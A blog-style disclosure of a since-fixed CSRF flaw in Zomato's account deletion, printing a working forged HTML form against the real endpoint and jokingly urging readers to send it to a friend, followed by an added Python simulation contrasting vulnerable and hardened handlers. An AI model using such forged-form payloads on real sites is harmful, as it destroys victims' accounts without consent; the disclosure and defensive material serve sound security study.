How I deleted your Zomato account!

Hi, friends :D,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I was caught by it, so I was messing around with Zomato. While checking out the settings section I found the “Delete my account” option, and after clicking on that a prompt appears like this:

[image: zomato hack]

Now, to delete the account you have to type “delete” inside it and confirm! But there was a flaw: there was no CSRF token to validate the request!

What is a CSRF token?
A CSRF token is a protective measure against cross-site request forgery attacks: the server checks it to tell whether a state-changing request really came from the legitimate user's own session, or from a page on some other site that only borrowed the user's browser (and cookies).

Now the exploitation part
I created a quick working proof of concept that allows you to delete any user's account; to delete his or her account you just need to send this code as an HTML page or as a link. 😛

Code?
<html>
<body>
<!-- Auto-posts to the delete endpoint; at the time it accepted the request with no CSRF token -->
<form action="https://www.zomato.com/php/delete_user_profile.php" method="POST">
<input type="hidden" name="reason" value="woot woot">
<!-- The server trusted the userid sent in the form instead of the logged-in session -->
<input type="hidden" name="userid" value="[User ID to whom you wanna delete]">
<input type="submit" value="Submit request">
</form>
</body>
</html>

Save this as delete.html and send it to your friend!

Video PoC:

https://www.youtube.com/watch?v=fRjdyg6s9rU

Exploitability?

It was easy to grab any user's userid just by visiting their profile and copying that user ID, which increased the severity 😉
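To make the two weaknesses above concrete (no CSRF token check, and a victim chosen by a caller-supplied userid), here is an added example in Python that is not from the original post or from Zomato's code. It models the delete endpoint as a plain function over a cookie dict and a form dict, with an in-memory session store; the names, the session layout and the sample user IDs are all constructed for illustration. The weak handler is shown beside a hardened one that binds a per-session token to the form, compares it in constant time, and deletes only the account that owns the session.

```python
import hmac
import secrets

# Constructed in-memory state (stands in for the real session store and user table).
SESSIONS = {}   # session_id -> {"user_id": ..., "csrf_token": ...}
ACCOUNTS = {}   # user_id -> "active" | "deleted"


def login(user_id):
    """Create a session for user_id and mint an unpredictable per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user_id": user_id, "csrf_token": secrets.token_urlsafe(32)}
    ACCOUNTS.setdefault(user_id, "active")
    return sid


def csrf_token_for(sid):
    """The token the legitimate settings page embeds in its delete form as a hidden field.
    A page on another origin cannot read it, so a forged form cannot carry it."""
    return SESSIONS[sid]["csrf_token"]


def delete_user_profile_vulnerable(cookies, form):
    """Handler in the shape the write-up describes: the session cookie proves someone
    is logged in, but the victim is taken from the form's 'userid' and no token is checked."""
    sid = cookies.get("session")
    if sid not in SESSIONS:
        return 401, "not logged in"
    target = form.get("userid")
    if target not in ACCOUNTS:
        return 404, "no such user"
    ACCOUNTS[target] = "deleted"
    return 200, "deleted " + target


def delete_user_profile_hardened(cookies, form):
    """Hardened handler: validates the per-session CSRF token with a constant-time
    compare, requires the typed confirmation word, and ignores any caller-supplied userid."""
    sid = cookies.get("session")
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "bad csrf token"
    if form.get("confirm") != "delete":
        return 400, "confirmation missing"
    target = session["user_id"]          # the session owner, never form["userid"]
    ACCOUNTS[target] = "deleted"
    return 200, "deleted " + target


def simulate_cross_site_post(victim_sid, form, handler):
    """A form auto-submitted from another site arrives with the victim's cookies attached
    but only the fields the attacker page wrote; the handler decides what happens."""
    return handler({"session": victim_sid}, form)


if __name__ == "__main__":
    # Constructed user IDs; the forged form mirrors the one in the write-up.
    forged = {"reason": "woot woot", "userid": "1001"}
    sid = login("1001")
    print(simulate_cross_site_post(sid, forged, delete_user_profile_vulnerable))  # (200, ...)
    sid = login("1002")
    print(simulate_cross_site_post(sid, dict(forged, userid="1002"), delete_user_profile_hardened))  # (403, ...)
    legit = {"csrf_token": csrf_token_for(sid), "confirm": "delete"}
    print(delete_user_profile_hardened({"session": sid}, legit))  # (200, ...)
```

Two design points worth noting: the token must be unpredictable and tied to the session (a static or guessable value would be as good as none), and the constant-time compare avoids leaking the token byte by byte through timing. Taking the victim from the session rather than the request also removes the need to guess user IDs at all, which is what made the original bug so easy to exploit.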

Fixing timeline:

[+] July 21, 2015: Reported to the support team

[+] Bug fixed by the team.

Let the #internet be a #safer place 🙂
signoff
